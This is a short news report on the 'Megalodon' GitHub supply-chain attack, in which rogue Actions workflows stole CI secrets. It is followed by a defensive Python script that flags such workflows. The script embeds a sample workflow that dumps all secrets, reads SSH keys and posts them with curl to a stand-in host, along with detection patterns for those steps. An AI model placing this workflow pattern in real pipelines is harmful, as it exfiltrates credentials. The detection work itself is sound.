Over 5,500 GitHub Repositories Hit by 'Megalodon' Supply Chain Attack
Massive GitHub attack infects 5,500+ repositories with malware, stealing sensitive data via rogue workflows in a supply chain breach.
By Content Team
More than 5,500 GitHub repositories were infected with malware on May 18, 2026, in a supply chain attack called Megalodon. Attackers pushed 5,718 malicious commits across a six-hour window using two email addresses, injecting rogue GitHub Actions workflows designed to steal credentials, AWS keys, SSH private keys, API tokens, and dozens of other secrets from CI environments.
The attack was discovered after compromised versions of the Tiledesk npm package were published May 19–21. The maintainer unknowingly published from the poisoned source: the attacker never touched the npm account, only the GitHub repository. A dormant backdoor was also planted, triggerable later via the GitHub API using stolen tokens.
Source: SecurityWeek
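As an added illustration (not code from the article or from SecurityWeek), the following Python triage script flags the workflow traits described above: a single expression that expands every repository secret, reads of SSH keys from the runner, outbound transfer from a `run` step, and triggers that can be fired through the GitHub API. The rogue workflow text and the rule list are constructed for this example; the regexes are heuristics, not a complete policy.

```python
import re

# Constructed sample of a rogue workflow like those described above: all
# secrets are read into the environment and sent off the runner. Hypothetical.
ROGUE_WORKFLOW = """\
name: ci
on:
  repository_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: collect
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          cat ~/.ssh/id_* 2>/dev/null | base64 -w0
          curl -s -X POST -d "$ALL" https://example.invalid/collect
"""

# (rule id, regex, why it matters). Line-based heuristics for CI review.
RULES = [
    ("secrets-dump", r"toJSON\(\s*secrets\s*\)", "expands every repository secret"),
    ("ssh-key-read", r"~/\.ssh/|\.ssh/id_", "reads SSH private keys on the runner"),
    ("encoded-output", r"\bbase64\b", "encodes data, common before exfiltration"),
    ("outbound-transfer", r"\b(curl|wget)\b.*https?://", "sends data to an external host"),
    ("api-triggerable", r"^\s*(repository_dispatch|workflow_dispatch)\s*:",
     "trigger reachable through the GitHub API with a token"),
]


def scan_workflow(text):
    """Return (rule id, line number, reason) for every line matching a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule_id, pattern, why in RULES:
            if re.search(pattern, line):
                findings.append((rule_id, lineno, why))
    return findings


def triage(text):
    """'block' when secrets are dumped and leave the runner, else 'review' or 'ok'."""
    ids = {f[0] for f in scan_workflow(text)}
    if "secrets-dump" in ids and "outbound-transfer" in ids:
        return "block"
    return "review" if ids else "ok"
```

Run it over every workflow file touched by a commit from an unfamiliar author before the commit is allowed to land; a 'block' result on a new workflow is exactly the pattern this campaign relied on.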